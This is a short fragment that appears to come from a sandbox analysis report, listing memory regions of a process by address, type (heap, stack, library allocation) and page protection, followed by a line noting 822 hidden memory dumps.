page read and write
ED9000
heap
page read and write
146A000
trusted library allocation
page execute and read and write
F6E000
heap
page read and write
4BC000
stack
page read and write
DDE000
heap
page read and write
BA4000
heap
page read and write
B10000
heap
page read and write
3073000
heap
page read and write
27F4890C000
heap
page read and write
3221000
heap
page read and write
27F485E5000
heap
page read and write
1067000
heap
page read and write
22B0000
heap
page read and write
There are 822 hidden memdumps, click here to show them.